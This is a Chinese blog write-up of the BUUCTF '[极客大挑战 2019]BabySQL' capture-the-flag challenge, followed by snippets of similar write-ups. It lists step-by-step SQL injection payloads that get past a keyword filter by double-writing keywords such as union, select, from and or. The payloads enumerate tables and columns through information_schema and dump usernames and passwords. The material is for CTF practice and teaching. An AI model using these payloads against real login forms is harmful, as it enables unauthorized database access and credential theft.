BUUCTF:[极客大挑战 2019]BabySQL 1

最新推荐文章于 2023-11-07 22:21:48 发布
最新推荐文章于 2023-11-07 22:21:48 发布
阅读量229 收藏 1
点赞数
分类专栏: CTF刷题记录 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/118999727
版权

 输入:

1'

1

 判断是单引号注入

输入:

1' order by 1#

1

 发现过滤了or,by

尝试双写注入

输入:

1' oorrder bbyy 4#

1

 是四列

输入:

1' ununionion seselectlect 1,database(),3#

1

 输入:

1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()#(from where 也被过滤了,information中有or)

1

 输入:

1' ununionion seselectlect 1,database(),group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'#

1

 输入:

1' ununionion seselectlect 1,2,group_concat(username,passwoorrd) ffromrom b4bsql #

1

 

~羽~.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 5876
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5038
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF[极客挑战 2019]BabySQL
rumil的博客
06-25 1862
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
记一次经典SQL双写绕过题目[极客挑战 2019]BabySQL 1
最新发布
m0_73734159的博客
11-07 628
在MySQL中是数据库,SCHEMATA表用来提供有关数据库的信息。根据常识ctf数据库里面存在flag的可能更大,故选择ctf数据库。联合注入末尾需要使用#号键进行注释#号后面的命令,避免报错。ctf.Flag意思就是ctf数据库里面的Flag数据表。联想到buuctf里面还没有碰到双写绕过的题目。爆所有数据库(关键命令采用双写进行绕过)爆数据库(关键命令采用双写进行绕过)爆列数(关键命令采用双写进行绕过)查位(关键命令采用双写进行绕过)爆ctf数据库里面的数据表。爆Flag数据表里面的字段。
BUUCTF [极客挑战 2019]BabySQL 1
Seizerz的博客
04-03 420
打开就是个登录框,这道题是注入,那无疑就是user或者password处了 输入数据,
BUUCTF-[极客挑战 2019]BabySQL 1
ITgougou_的博客
12-19 221
题目考察了字符绕过,注释符绕过,sql双写绕过 http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin . 可以看到or和by关键字被过滤 尝试双写绕过 http://7738142d-0bba-4e...
[极客挑战 2019]BabySQL 1
bring_coco的博客
09-22 5208
[极客挑战 2019]BabySQL 1 [目标] Sql注入 [环境] Buuctf [工具] 浏览器 [分析] 1.直接试万能密码 发现无法登录 2.直接进行sql注入 尝试1’ order by 3# 发现order中的or被过滤,同时by也被过滤 因此直接尝试联合注入 Payload: 1’union select 1#&password=1 Url: 1%27union%20select%201%23&password=1 可以发现这里union select都被过滤了,因
[极客挑战 2019]BabySQL
weixin_41571993的博客
10-04 665
靶场练习
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
GeekUniversityWebTask:极客大学前端训练营作业
04-18
GeekUniversityWebTask极客大学作业提交
mercado-c:极客大学正在进行的项目
04-09
极客大学正在进行的项目 向用户显示菜单的应用程序; 将产品添加到购物车时,只需更改数量即可检查购物车中是否已存在同一产品。 在购买结束时,必须根据购物车中输入的产品和数量将总额显示给用户。
微信小程序demo:极客学院
03-15
一个同学的毕业设计,微信小程序也可以做成毕业设计了吗?   免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的...
微信小程序学习用demo:极客学院
03-15
点评:简单的两个页面:   免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系网站客服处理。
[极客挑战 2019]BabySQL1
qq_51902218的博客
08-10 235
1.判断注入类型 1' 发现报错 原因:select name.passwd from users where username=' 1' ' and password=‘ ’; 有语法错误 所以可以判断为字符型注入
BUUCTF-[极客挑战 2019]BabySQL1
Monica的博客
10-02 1080
目录 题目: 分析: 题目: 分析: 先测试是什么闭合 near ' ' 123' 'and password=' 'amdin' ' ' at line 1 通过拆分可以看出用户名和密码都是单引号闭合 猜测后台语句为: ' select xxx from xxx where username='' and password='' ' 测试有几列: 发现有过滤。 union 和select也被过滤了,试试...
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 923
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值